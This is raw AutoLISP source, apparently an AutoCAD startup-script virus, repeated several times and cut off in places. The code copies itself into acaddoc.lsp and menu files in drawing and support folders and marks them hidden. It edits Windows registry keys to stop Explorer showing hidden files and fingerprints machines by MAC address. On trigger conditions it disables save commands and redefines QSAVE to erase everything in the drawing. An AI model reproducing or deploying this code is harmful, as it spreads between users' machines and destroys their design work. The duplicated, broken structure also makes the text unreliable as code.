  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
